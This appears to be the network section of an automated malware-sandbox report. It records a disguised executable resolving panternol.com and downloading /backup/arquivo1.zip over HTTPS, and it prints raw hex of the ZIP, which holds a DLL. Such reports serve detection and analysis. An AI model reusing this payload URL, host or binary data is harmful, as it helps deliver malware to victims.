Nov 25, 2024 11:13:24.779326916 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:24.779547930 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.779556990 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:24.823338985 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.827198982 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:24.827220917 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:24.874963045 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.284694910 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.284738064 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.284746885 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.284773111 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.284866095 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.284866095 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.284883976 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.340253115 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.481013060 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481028080 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481064081 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481080055 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481097937 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481106997 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.481134892 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.481306076 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.539391994 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.539410114 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.539427996 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.539449930 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.539521933 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.539541006 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.539577007 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.540158033 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.663086891 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.663109064 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.663341045 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.663356066 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.663431883 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.692264080 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.692282915 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.692359924 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.692359924 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.692374945 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.692445040 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.721744061 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.721760988 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.722068071 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.722090960 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.722181082 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.743035078 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.743051052 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.743104935 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.743119001 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.743155956 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.743155956 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.863464117 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.863488913 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.863535881 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.863550901 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.863586903 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.863651991 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.874671936 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.874706030 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.874766111 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.874772072 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.874805927 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.874805927 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.892560005 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.892580986 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.892724991 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.892724991 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.892734051 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.892793894 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.907293081 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.907320976 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.907516003 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.907524109 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.909424067 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.920479059 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.920500994 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.920583963 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.920597076 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.920682907 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.975389004 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.975414991 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.975511074 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:25.975526094 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:25.975616932 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.048885107 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.048912048 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.049045086 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.049045086 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.049073935 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.049125910 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.059544086 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.059560061 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.059644938 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.059653997 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.059767962 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.069677114 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.069698095 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.069788933 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.069797039 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.069892883 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.080204010 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.080221891 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.080296040 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.080303907 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.080395937 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.089140892 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.089163065 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.089319944 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.089327097 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.089384079 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.098673105 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.098690987 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.098856926 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.098872900 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.098926067 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.159967899 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.159985065 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.160056114 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.160089970 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.160166979 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.168219090 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.168235064 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.168343067 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.168361902 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.168414116 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.248994112 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.249027014 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.249099970 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.249103069 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.249126911 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.249205112 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.249205112 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.255373955 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.255400896 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.255460024 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.255472898 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.255624056 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.261600971 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.261639118 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.261703014 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.261703014 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.261710882 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.268779039 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.268809080 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.268845081 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.268852949 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.268881083 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.275383949 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.275413036 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.275460005 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.275466919 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.275482893 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.278311968 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.278387070 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.278399944 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.278412104 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.278480053 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.290072918 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.290092945 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:26.290138006 CET	49735	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:26.290143013 CET	443	49735	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:27.220129013 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:27.220237017 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:27.220310926 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:27.223859072 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:27.223896027 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.762449026 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.764601946 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.764626026 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.764745951 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.764750957 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.765801907 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.765868902 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.774193048 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.774286032 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.774344921 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.824908018 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:28.824948072 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:28.872607946 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:29.626153946 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:29.626238108 CET	443	49737	34.95.207.248	192.168.2.4
Nov 25, 2024 11:13:29.626305103 CET	49737	443	192.168.2.4	34.95.207.248
Nov 25, 2024 11:13:30.308990955 CET	49737	443	192.168.2.4	34.95.207.248

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:13:22.929949045 CET	55044	53	192.168.2.4	1.1.1.1
Nov 25, 2024 11:13:23.264719009 CET	53	55044	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 11:13:22.929949045 CET	192.168.2.4	1.1.1.1	0xf62d	Standard query (0)	panternol.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 11:13:23.264719009 CET	1.1.1.1	192.168.2.4	0xf62d	No error (0)	panternol.com		34.95.207.248	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

panternol.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	34.95.207.248	443	7120	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:13:24 UTC	113	OUT	GET /backup/arquivo1.zip HTTP/1.1 Host: panternol.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-11-25 10:13:25 UTC	283	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:13:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 25 Nov 2024 10:08:29 GMT ETag: "6b876-627b9ea0c6cf0" Accept-Ranges: bytes Content-Length: 440438 Connection: close Content-Type: application/zip
2024-11-25 10:13:25 UTC	7909	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 0e 51 79 59 90 0e 8a b3 ec b5 01 00 00 68 03 00 13 00 00 00 43 6c 61 73 73 69 63 49 45 44 4c 4c 5f 36 34 2e 64 6c 6c dc bd 79 7c 54 d5 d9 38 7e 67 4b 06 92 70 27 92 48 10 90 28 51 83 71 09 04 db c4 91 32 97 cc 90 73 e1 8e 04 11 89 22 18 1b a5 d1 ba b0 cc b0 28 b2 38 89 72 3d 1d a5 df ea ab 6d dd da d7 5a ed 6b d5 b6 96 cd 85 2c 90 05 90 55 25 88 0a 2e d5 1b 07 db 80 35 04 41 ee ef 79 9e 73 67 49 82 4b bf bf f7 f3 fb e3 e7 47 32 f7 9e 7b ee 39 cf 79 ce 73 9e fd 9c 1b bc 6e 8d e4 90 24 c9 09 ff 4c 53 92 d6 4b e2 3f 9f f4 fd ff 79 6c 92 34 68 e4 c6 41 d2 2b 03 de 3c 67 bd 4d 7b f3 9c ab 6b 6f 59 98 3f 6f c1 9d 3f 5b 70 e3 ed f9 35 37 de 71 c7 9d a1 fc 9f de 9c bf 20 7c 47 fe 2d 77 e4 fb a7 4e cf bf fd ce 9b 6e be 24 2b 6b 60 81 Data Ascii: PKQyYhClassicIEDLL_64.dlly\|T8~gKp'H(Qq2s"(8r=mZk,U%.5AysgIKG2{9ysn$LSK?yl4hA+<gM{koY?o?[p57q \|G-wNn$+k`
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 9a 05 65 3d 96 a1 b6 b4 bf 11 a1 ef 62 45 5d 6c 3c 96 85 0b 98 b7 6b f1 5e d4 48 ce b2 de d0 12 53 b7 c3 f8 53 23 9a d9 5d 5a d1 29 9c ad 42 54 37 80 e5 e5 27 a7 a0 17 bd 8b f8 11 cd c5 0c c6 0f 83 49 28 d8 a5 6b 02 c6 ce 28 a4 df 83 bc 0d 10 65 91 39 c8 a0 99 95 5a cd c0 c9 51 e7 00 e6 6d 5b 38 5c 01 89 83 99 0a c0 af 78 36 8b 4e b4 31 dd 26 af b5 77 7e 4a 01 f8 4d 84 95 f0 c0 f5 b8 28 3b f7 60 28 0a d9 1f b0 3e 15 58 1f e0 e6 51 e1 12 7d 88 b2 ad f4 01 a0 b4 21 66 10 45 15 88 1b 8b 89 46 56 00 c7 19 66 cc f8 1f 4c 94 33 29 6d 00 30 8d ca fc da 8e ce bb e2 4a 7d a0 83 b5 06 0c 5a f6 ad 81 2e 11 da ee 90 8c 91 ff 83 1c a8 01 5e 94 eb 06 61 dd 91 16 cf 0e 1a a0 5a 75 81 31 ba 10 ec 1b 05 00 0f 18 2c 0a 8d 80 5a 0f 0a 7f a0 c3 bf da e9 6e f1 bb 6d c0 58 02 Data Ascii: e=bE]l<k^HSS#]Z)BT7'I(k(e9ZQm[8\x6N1&w~JM(;`(>XQ}!fEFVfL3)m0J}Z.^aZu1,ZnmX
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: ce 7f 10 d5 ab 9e 20 8c 87 30 5b 25 d4 3e 89 a0 f8 33 86 a0 f8 da 9b a4 46 7a 9b 87 80 45 00 bc 13 01 70 d3 0a 0e 80 f3 99 01 80 5e 03 00 c7 18 00 78 1d ad 2b a9 83 bd 78 a2 bf 4f 50 68 b8 6e 14 22 f6 33 d0 d4 aa f7 39 fc a5 5a b8 ed 14 92 9d 78 0c 29 18 18 08 78 59 e1 a9 2c 0b ce e2 7d 94 cc 95 14 cc f8 1e 01 a0 7f 35 bb f6 30 1d 2d ab 2f 38 5a aa dd be b5 42 e8 4d 3a 5a ea 15 2d 7b b7 4f d7 11 f0 5a d0 29 5d 31 8e 18 4f e2 88 a9 26 78 fa c2 c4 cf 18 02 a5 c3 34 45 13 f1 90 a9 36 46 f6 26 1e 32 57 53 84 25 1f c6 f9 78 13 a6 75 03 1b 26 74 16 a8 b3 78 59 3a 94 85 62 e6 80 80 85 ec 0c 22 13 b8 0d 9e 08 2d d9 6d 0a e4 b3 bb 3f 42 38 9b b6 1b 8e 9a c0 e0 ba bd 00 79 0a 95 f8 77 27 43 de c4 76 df bb 9e a0 dc 7d 2a 7b 02 36 5f 35 4e 91 27 71 1a c4 81 2d 71 1c Data Ascii: 0[%>3FzEp^x+xOPhn"39Zx)xY,}50-/8ZBM:Z-{OZ)]1O&x4E6F&2WS%xu&txY:b"-m?B8yw'Cv}*{6_5N'q-q
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: f5 66 61 55 53 97 8f 42 0f 62 37 80 d0 bb a6 c4 47 45 4c c9 1f f5 37 7c ef 63 81 22 c6 fd 1f 3e 2a 18 80 8f a1 6f 2a 68 14 a6 b7 c2 37 b5 19 df 14 cb a1 c4 97 a2 10 34 57 08 07 1a 10 45 c1 c0 1d f8 35 9f d3 d7 f4 c1 af 11 6a 6f 44 51 ae f1 45 c7 a2 57 90 4c 34 3e fe 80 83 c6 7e 41 c7 92 ba b9 31 49 0e 07 47 61 16 e9 ce 31 26 ca 90 fa 41 ec 93 ef 74 fd 9f 88 ef 00 1b 8f 6b 30 d2 3d 01 4e 55 d4 56 a5 20 52 b2 d2 66 17 eb cd b2 1e a9 6d 08 7c 2a 85 be 34 07 bf 42 71 fb 21 78 73 2d be 89 20 1f db d2 bb 8d 72 c6 0d bd d9 70 8d 1a 90 6c c3 15 ba 7f 03 4a 0e de 94 c2 fe 37 c5 bf 98 d1 32 4b a4 70 7c ec fd 3f fc 08 cb ae 19 7f eb c1 b2 ab e4 6f 9d 36 cb 17 9a 2c 77 fb 97 14 7f b5 00 03 c6 04 1e 3a 15 41 24 1f 18 26 ac 33 df 64 cb 08 ce 92 f4 88 ac b7 04 26 c3 4c Data Ascii: faUSBb7GEL7\|c">oh74WE5joDQEWL4>~A1IGa1&Atk0=NUV Rfm\|*4Bq!xs- rplJ72Kp\|?o6,w:A$&3d&L
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 01 41 3b 56 73 ed 4a 14 55 1c c4 e0 35 75 ba 9f 12 31 c2 3a 52 de 93 b0 d9 c0 b7 19 25 93 93 77 a0 81 9c 57 90 93 95 37 49 aa 1f de 8e ec 76 eb b3 08 10 e5 e4 3a 5c 89 a0 f5 93 ed 94 b7 05 7e 14 db 33 c4 c0 6f da 8e 3a 09 35 ef 1b ab 4e a1 8f d0 87 e1 f4 d4 5b 37 41 a2 51 8f 48 42 f1 4a e3 9f 26 83 bc e7 f1 7b 74 5b b9 39 23 bc 1d 4f e1 99 74 21 f3 00 0e 3f f1 8a 0e 87 29 20 c5 8f ca e5 c7 d1 69 8d d4 8d 40 77 36 7a ca 96 c7 16 02 da e6 92 7e f2 48 9b e5 bb 8d b9 39 5c d9 34 84 26 e6 5f 00 3b c9 e2 03 3d d6 c5 6a a9 a6 10 e0 1e 8b 5c 8e f5 cd 9a 63 c7 3f 0c 51 db 41 72 92 ed ec f6 5f 04 44 a0 45 08 be 88 60 30 78 4b 6a 51 f0 96 91 82 bc 0a 6e a6 ba 2a 74 07 0a d7 50 78 bf 0e f8 d3 50 c4 78 db df 59 1d 9b 69 07 5d 97 1a 45 48 5a 1e 86 63 00 04 9d 29 b8 2a Data Ascii: A;VsJU5u1:R%wW7Iv:\~3o:5N[7AQHBJ&{t[9#Ot!?) i@w6z~H9\4&_;=j\c?QAr_DE`0xKjQntPxPxYi]EHZc)
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 58 59 58 eb 70 ec 2a 47 53 f0 59 78 1e 41 d6 31 09 8e a6 40 47 0e 38 1e 98 30 1b d8 cc 05 c9 c5 05 26 a8 b2 56 cf 6e 33 c6 c3 29 65 40 c9 b7 b3 09 83 1e 37 6a 8b 69 ce 47 40 ae bf 56 65 28 41 79 10 e8 ca 88 53 dd 2b 4f 73 46 6c 4d c1 5f 63 c9 91 b5 a7 4e 30 df 4a f1 50 27 f4 0e 12 d4 8e f0 d3 8a da 81 b3 04 3c e9 a1 2d ce 5f 63 ea 9b 1c 87 e7 9a 98 c1 c1 f7 94 03 50 52 da b4 b4 4b 1c 87 e7 4f b6 64 c3 df 13 ce 67 95 a0 15 b8 4b 0a 8c 1b 94 fb 7a 77 47 8e 95 95 06 5e 08 e4 c6 5f a1 02 01 05 41 de 8c 97 c3 30 11 1f bf 14 fb 3c 79 2f 61 b1 80 4a f1 1a 96 0a 56 3c 50 ab 84 e2 22 8a 04 94 14 2c 26 bc 64 1c 9a ad 8f 59 07 67 47 d2 db e7 b0 8c 4f 38 8f c9 fc 2c e5 03 44 f6 77 c8 94 9e 97 be 16 ae 28 3b 44 36 28 cd 05 1d 99 b3 43 31 2b b5 c5 de 6d c5 b4 e9 cd f0 Data Ascii: XYXp*GSYxA1@G80&Vn3)e@7jiG@Ve(AyS+OsFlM_cN0JP'<-_cPRKOdgKzwG^_A0<y/aJV<P",&dYgGO8,Dw(;D6(C1+m
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 3d 62 64 2f f6 e2 d4 91 fd 2f 45 f8 84 c5 81 b4 db 08 8b 95 68 3b 08 8b fe 83 58 87 22 d6 a9 b4 92 fd 83 42 5e 84 85 de da 45 f8 27 84 c5 ba 15 b1 ae 45 23 fb 16 c2 62 9d 82 58 57 d1 47 f6 e2 5e 3a b1 ce 45 ac 83 49 da c7 b1 d0 23 c5 ba 17 b1 2e 26 83 ec 85 de 9b 49 78 9b 48 0f 61 71 0f 9d f2 7f d8 7b 0f c0 28 8a bf 8f 7b f6 d2 2b 97 02 29 04 72 a1 25 f4 03 22 84 92 dd 90 04 a4 13 42 80 20 28 97 72 90 40 ca 71 b9 d0 44 08 45 8a a0 04 04 45 45 8d 48 89 88 12 b1 21 7f d4 a0 88 a8 a8 11 50 01 51 43 51 01 11 2f 05 08 fd fd 4e d9 cb e5 48 e4 ff 7f 9f e7 79 9f b7 2d fc f2 f9 cd cc 6f 67 a7 cf ec de de 9c 70 bf 2c dc a9 c2 ad 7e 37 58 7d 8f 46 7d cf 26 4b 84 ab f7 eb ea 7b 35 ea 7b f3 73 44 b8 ba 2e 56 df 93 10 8f d1 c9 0a 11 ae fe ee dd 46 e1 de 2e dc a5 c2 ad Data Ascii: =bd//Eh;X"B^E'E#bXWG^:EI#.&IxHaq{({+)r%"B (r@qDEEEH!PQCQ/NHy-ogp,~7X}F}&K{5{sD.VF.
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 61 05 b5 7e dc 9f 51 e8 94 c5 7e dc e6 38 58 27 fc e9 fb 3e ed fc b9 4e f7 46 cb 0e e0 7b 5c 99 c0 87 03 09 39 7f 8b bf 57 7c ab 39 ce 81 6e bf 37 92 fd be 49 94 c5 41 84 44 43 a7 dc 00 49 81 4e b9 19 92 09 dd 7e ef 23 ca 94 50 9c 03 9d b2 08 52 0a 9d 32 b6 15 f2 03 9d 72 74 2b e1 0f fa 87 23 6d d0 ed f7 3b a2 ec a9 23 a4 16 3a 65 2f 48 20 cd 2f 68 d6 f1 fc 96 80 67 20 5d a8 7f 04 7f 3f 23 06 3a e5 a6 08 61 03 9e 12 7a 25 58 15 c1 cb 84 3e e0 1c d0 86 fb 27 81 6b 20 43 a0 57 80 73 db 63 cd 06 bd 08 fc a4 3d 8f 9f be 93 12 d9 81 eb f4 3d 96 c7 84 5e 0c 6a 22 71 3d 5a 2f 60 8f 48 1e a7 29 92 bf 37 43 d3 43 79 58 f8 57 80 37 85 4e 37 1f 18 1d c5 d3 63 00 2f 75 44 99 d0 b4 d9 ed 67 44 d9 0f 12 05 9d 72 08 64 00 dd 3b c8 6e 3f 23 ca e7 21 23 a0 53 96 42 0c d0 Data Ascii: a~Q~8X'>NF{\9W\|9n7IADCIN~#PR2rt+#m;#:e/H /hg ]?#:az%X>'k CWsc==^j"q=Z/`H)7CCyXW7N7c/uDgDrd;n?#!#SB
